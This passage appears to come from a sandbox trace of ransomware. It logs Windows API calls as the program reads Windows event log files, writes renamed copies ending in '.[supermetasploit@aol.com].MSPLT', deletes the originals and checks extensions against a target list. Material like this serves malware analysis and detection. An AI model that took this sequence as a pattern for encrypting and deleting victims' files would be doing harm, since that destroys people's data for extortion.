"c:\\logs\\key management service.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x444 [0286.791] GetLastError () returned 0x0 [0286.791] ReadFile (in: hFile=0x42c, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x11000, lpOverlapped=0x0) returned 1 [0286.820] WriteFile (in: hFile=0x444, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0x11010, lpOverlapped=0x0) returned 1 [0286.823] ReadFile (in: hFile=0x42c, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x0, lpOverlapped=0x0) returned 1 [0286.823] WriteFile (in: hFile=0x444, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0x10a, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0x10a, lpOverlapped=0x0) returned 1 [0286.824] SetEndOfFile (hFile=0x444) returned 1 [0286.846] CloseHandle (hObject=0x444) returned 1 [0287.489] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0287.489] SetEndOfFile (hFile=0x42c) returned 1 [0287.540] CloseHandle (hObject=0x42c) returned 1 [0287.540] SetFileAttributesW (lpFileName="C:\\Logs\\Key Management Service.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0287.541] DeleteFileW (lpFileName="C:\\Logs\\Key Management Service.evtx" (normalized: "c:\\logs\\key management service.evtx")) returned 1 [0287.541] lstrlenW (lpString="C:\\Logs\\Key Management Service.evtx") returned 35 [0287.541] lstrlenW (lpString="C:\\Logs\\Key Management Service.evtx") returned 35 [0287.541] lstrlenW (lpString=".doc") returned 4 [0287.541] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0287.541] lstrlenW (lpString=".docx") returned 5 [0287.541] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0287.541] lstrlenW (lpString=".pdf") returned 4 [0287.541] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0287.541] lstrlenW (lpString=".xls") returned 4 [0287.541] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0287.541] lstrlenW (lpString=".xlsx") returned 5 [0287.541] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0287.541] lstrlenW (lpString=".ppt") returned 4 [0287.541] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0287.541] lstrlenW (lpString="C:\\Logs\\Key Management Service.evtx") returned 35 [0287.541] lstrlenW (lpString=".zip") returned 4 [0287.541] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0287.541] lstrlenW (lpString=".rar") returned 4 [0287.542] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0287.542] lstrlenW (lpString=".bz2") returned 4 [0287.542] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0287.542] lstrlenW (lpString=".7z") returned 3 [0287.542] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0287.542] lstrlenW (lpString="C:\\Logs\\Key Management Service.evtx") returned 35 [0287.542] lstrlenW (lpString=".dbf") returned 4 [0287.542] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0287.542] lstrlenW (lpString="C:\\Logs\\Key Management Service.evtx") returned 35 [0287.542] lstrlenW (lpString=".1cd") returned 4 [0287.542] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0287.542] lstrlenW (lpString="C:\\Logs\\Key Management Service.evtx") returned 35 [0287.542] lstrlenW (lpString=".jpg") returned 4 [0287.542] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0287.542] lstrlenW (lpString="C:\\Logs\\Key Management Service.evtx") returned 35 [0287.542] lstrlenW (lpString="C:\\Logs\\Key Management Service.evtx") returned 35 [0287.542] lstrlenW (lpString=".doc") returned 4 [0287.542] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0287.542] lstrlenW (lpString=".docx") returned 5 [0287.542] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0287.542] lstrlenW (lpString=".pdf") returned 4 [0287.542] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0287.542] lstrlenW (lpString=".xls") returned 4 [0287.542] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0287.542] lstrlenW (lpString=".xlsx") returned 5 [0287.542] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0287.542] lstrlenW (lpString=".ppt") returned 4 [0287.542] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0287.542] lstrlenW (lpString="C:\\Logs\\Key Management Service.evtx") returned 35 [0287.542] lstrlenW (lpString=".zip") returned 4 [0287.542] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0287.542] lstrlenW (lpString=".rar") returned 4 [0287.542] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0287.542] lstrlenW (lpString=".bz2") returned 4 [0287.543] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0287.543] lstrlenW (lpString=".7z") returned 3 [0287.543] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0287.543] lstrlenW (lpString="C:\\Logs\\Key Management Service.evtx") returned 35 [0287.543] lstrlenW (lpString=".dbf") returned 4 [0287.543] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0287.543] lstrlenW (lpString="C:\\Logs\\Key Management Service.evtx") returned 35 [0287.543] lstrlenW (lpString=".1cd") returned 4 [0287.543] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0287.543] lstrlenW (lpString="C:\\Logs\\Key Management Service.evtx") returned 35 [0287.543] lstrlenW (lpString=".jpg") returned 4 [0287.543] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0287.543] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0287.543] lstrlenW (lpString="Microsoft-Windows-AppLocker%4MSI and Script.evtx") returned 48 [0287.543] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4msi and script.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x42c [0287.543] GetFileSizeEx (in: hFile=0x42c, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=69632) returned 1 [0287.544] CloseHandle (hObject=0x42c) returned 1 [0287.544] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4msi and script.evtx")) returned 0x20 [0287.544] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-applocker%4msi and script.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0287.544] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4msi and script.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x42c [0287.544] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0287.544] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0287.544] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-applocker%4msi and script.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0287.545] GetLastError () returned 0x0 [0287.545] ReadFile (in: hFile=0x42c, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x11000, lpOverlapped=0x0) returned 1 [0287.732] WriteFile (in: hFile=0x434, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0x11010, lpOverlapped=0x0) returned 1 [0287.735] ReadFile (in: hFile=0x42c, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x0, lpOverlapped=0x0) returned 1 [0287.735] WriteFile (in: hFile=0x434, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0x134, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0x134, lpOverlapped=0x0) returned 1 [0287.736] SetEndOfFile (hFile=0x434) returned 1 [0287.736] CloseHandle (hObject=0x434) returned 1 [0287.738] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0287.739] SetEndOfFile (hFile=0x42c) returned 1 [0287.740] CloseHandle (hObject=0x42c) returned 1 [0287.740] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0287.741] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx" (normalized: "c:\\logs\\microsoft-windows-applocker%4msi and script.evtx")) returned 1 [0287.741] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx") returned 56 [0287.741] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx") returned 56 [0287.741] lstrlenW (lpString=".doc") returned 4 [0287.741] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0287.741] lstrlenW (lpString=".docx") returned 5 [0287.741] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0287.741] lstrlenW (lpString=".pdf") returned 4 [0287.741] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0287.741] lstrlenW (lpString=".xls") returned 4 [0287.741] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0287.741] lstrlenW (lpString=".xlsx") returned 5 [0287.741] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0287.741] lstrlenW (lpString=".ppt") returned 4 [0287.741] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0287.741] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx") returned 56 [0287.741] lstrlenW (lpString=".zip") returned 4 [0287.741] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0287.741] lstrlenW (lpString=".rar") returned 4 [0287.741] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0287.741] lstrlenW (lpString=".bz2") returned 4 [0287.741] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0287.741] lstrlenW (lpString=".7z") returned 3 [0287.741] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0287.742] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx") returned 56 [0287.742] lstrlenW (lpString=".dbf") returned 4 [0287.742] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0287.742] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx") returned 56 [0287.742] lstrlenW (lpString=".1cd") returned 4 [0287.742] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0287.742] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx") returned 56 [0287.742] lstrlenW (lpString=".jpg") returned 4 [0287.742] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0287.742] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx") returned 56 [0287.742] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx") returned 56 [0287.742] lstrlenW (lpString=".doc") returned 4 [0287.742] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0287.742] lstrlenW (lpString=".docx") returned 5 [0287.742] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0287.742] lstrlenW (lpString=".pdf") returned 4 [0287.742] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0287.742] lstrlenW (lpString=".xls") returned 4 [0287.742] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0287.742] lstrlenW (lpString=".xlsx") returned 5 [0287.742] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0287.742] lstrlenW (lpString=".ppt") returned 4 [0287.742] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0287.742] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx") returned 56 [0287.742] lstrlenW (lpString=".zip") returned 4 [0287.742] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0287.742] lstrlenW (lpString=".rar") returned 4 [0287.742] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0287.742] lstrlenW (lpString=".bz2") returned 4 [0287.742] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0287.742] lstrlenW (lpString=".7z") returned 3 [0287.742] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0287.742] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx") returned 56 [0287.743] lstrlenW (lpString=".dbf") returned 4 [0287.743] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0287.743] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx") returned 56 [0287.743] lstrlenW (lpString=".1cd") returned 4 [0287.743] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0287.743] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppLocker%4MSI and Script.evtx") returned 56 [0287.743] lstrlenW (lpString=".jpg") returned 4 [0287.743] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0287.743] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0287.743] lstrlenW (lpString="Microsoft-Windows-AppModel-Runtime%4Admin.evtx") returned 46 [0287.743] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-appmodel-runtime%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x42c [0287.743] GetFileSizeEx (in: hFile=0x42c, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=69632) returned 1 [0287.743] CloseHandle (hObject=0x42c) returned 1 [0287.744] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-appmodel-runtime%4admin.evtx")) returned 0x20 [0287.744] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-appmodel-runtime%4admin.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0287.744] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-appmodel-runtime%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x42c [0287.745] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0287.745] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0287.745] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-appmodel-runtime%4admin.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x450 [0288.104] GetLastError () returned 0x0 [0288.104] ReadFile (in: hFile=0x42c, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x11000, lpOverlapped=0x0) returned 1 [0288.114] WriteFile (in: hFile=0x450, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0x11010, lpOverlapped=0x0) returned 1 [0288.117] ReadFile (in: hFile=0x42c, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x0, lpOverlapped=0x0) returned 1 [0288.117] WriteFile (in: hFile=0x450, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0x130, lpOverlapped=0x0) returned 1 [0288.117] SetEndOfFile (hFile=0x450) returned 1 [0288.117] CloseHandle (hObject=0x450) returned 1 [0288.120] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0288.120] SetEndOfFile (hFile=0x42c) returned 1 [0288.122] CloseHandle (hObject=0x42c) returned 1 [0288.122] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0288.123] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-appmodel-runtime%4admin.evtx")) returned 1 [0288.127] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx") returned 54 [0288.127] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx") returned 54 [0288.127] lstrlenW (lpString=".doc") returned 4 [0288.127] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0288.127] lstrlenW (lpString=".docx") returned 5 [0288.127] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0288.127] lstrlenW (lpString=".pdf") returned 4 [0288.127] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0288.127] lstrlenW (lpString=".xls") returned 4 [0288.127] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0288.127] lstrlenW (lpString=".xlsx") returned 5 [0288.127] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0288.127] lstrlenW (lpString=".ppt") returned 4 [0288.127] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0288.127] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx") returned 54 [0288.127] lstrlenW (lpString=".zip") returned 4 [0288.127] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0288.127] lstrlenW (lpString=".rar") returned 4 [0288.127] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0288.127] lstrlenW (lpString=".bz2") returned 4 [0288.127] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0288.127] lstrlenW (lpString=".7z") returned 3 [0288.128] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0288.128] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx") returned 54 [0288.128] lstrlenW (lpString=".dbf") returned 4 [0288.128] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0288.128] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx") returned 54 [0288.128] lstrlenW (lpString=".1cd") returned 4 [0288.128] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0288.128] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx") returned 54 [0288.128] lstrlenW (lpString=".jpg") returned 4 [0288.128] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0288.128] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx") returned 54 [0288.128] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx") returned 54 [0288.128] lstrlenW (lpString=".doc") returned 4 [0288.128] lstrcmpiW (lpString1=".doc", lpString2="evtx") returned -1 [0288.128] lstrlenW (lpString=".docx") returned 5 [0288.128] lstrcmpiW (lpString1=".docx", lpString2=".evtx") returned -1 [0288.128] lstrlenW (lpString=".pdf") returned 4 [0288.128] lstrcmpiW (lpString1=".pdf", lpString2="evtx") returned -1 [0288.128] lstrlenW (lpString=".xls") returned 4 [0288.128] lstrcmpiW (lpString1=".xls", lpString2="evtx") returned -1 [0288.128] lstrlenW (lpString=".xlsx") returned 5 [0288.128] lstrcmpiW (lpString1=".xlsx", lpString2=".evtx") returned 1 [0288.128] lstrlenW (lpString=".ppt") returned 4 [0288.128] lstrcmpiW (lpString1=".ppt", lpString2="evtx") returned -1 [0288.128] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx") returned 54 [0288.128] lstrlenW (lpString=".zip") returned 4 [0288.129] lstrcmpiW (lpString1=".zip", lpString2="evtx") returned -1 [0288.129] lstrlenW (lpString=".rar") returned 4 [0288.129] lstrcmpiW (lpString1=".rar", lpString2="evtx") returned -1 [0288.129] lstrlenW (lpString=".bz2") returned 4 [0288.129] lstrcmpiW (lpString1=".bz2", lpString2="evtx") returned -1 [0288.129] lstrlenW (lpString=".7z") returned 3 [0288.129] lstrcmpiW (lpString1=".7z", lpString2="vtx") returned -1 [0288.129] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx") returned 54 [0288.129] lstrlenW (lpString=".dbf") returned 4 [0288.129] lstrcmpiW (lpString1=".dbf", lpString2="evtx") returned -1 [0288.129] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx") returned 54 [0288.129] lstrlenW (lpString=".1cd") returned 4 [0288.129] lstrcmpiW (lpString1=".1cd", lpString2="evtx") returned -1 [0288.129] lstrlenW (lpString="C:\\Logs\\Microsoft-Windows-AppModel-Runtime%4Admin.evtx") returned 54 [0288.129] lstrlenW (lpString=".jpg") returned 4 [0288.129] lstrcmpiW (lpString1=".jpg", lpString2="evtx") returned -1 [0288.129] lstrcmpiW (lpString1=".evtx", lpString2=".MSPLT") returned -1 [0288.129] lstrlenW (lpString="Microsoft-Windows-AppReadiness%4Admin.evtx") returned 42 [0288.129] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0288.132] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x35dff14 | out: lpFileSize=0x35dff14*=69632) returned 1 [0288.132] CloseHandle (hObject=0x438) returned 1 [0288.132] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4admin.evtx")) returned 0x20 [0288.132] GetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4admin.evtx.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0288.133] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0288.133] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0288.133] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0288.133] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4admin.evtx.id-b4197730.[supermetasploit@aol.com].msplt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x42c [0288.133] GetLastError () returned 0x0 [0288.133] ReadFile (in: hFile=0x438, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x11000, lpOverlapped=0x0) returned 1 [0288.142] WriteFile (in: hFile=0x42c, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0x11010, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0x11010, lpOverlapped=0x0) returned 1 [0288.145] ReadFile (in: hFile=0x438, lpBuffer=0x3ec4020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x35dfecc, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesRead=0x35dfecc*=0x0, lpOverlapped=0x0) returned 1 [0288.145] WriteFile (in: hFile=0x42c, lpBuffer=0x3ec4020*, nNumberOfBytesToWrite=0x128, lpNumberOfBytesWritten=0x35dfc94, lpOverlapped=0x0 | out: lpBuffer=0x3ec4020*, lpNumberOfBytesWritten=0x35dfc94*=0x128, lpOverlapped=0x0) returned 1 [0288.145] SetEndOfFile (hFile=0x42c) returned 1 [0288.145] CloseHandle (hObject=0x42c) returned 1 [0288.148] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x35dfec0 | out: lpNewFilePointer=0x0) returned 1 [0288.148] SetEndOfFile (hFile=0x438) returned 1 [0288.150] CloseHandle (hObject=0x438) returned 1 [0288.150] SetFileAttributesW (lpFileName="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx.id-B4197730.[supermetasploit@aol.com].MSPLT", dwFileAttributes=0x20) returned 1 [0288.150] DeleteFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppReadiness%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-appreadiness%4admin.evtx")) returned 1 [0288.151] lstrlenW 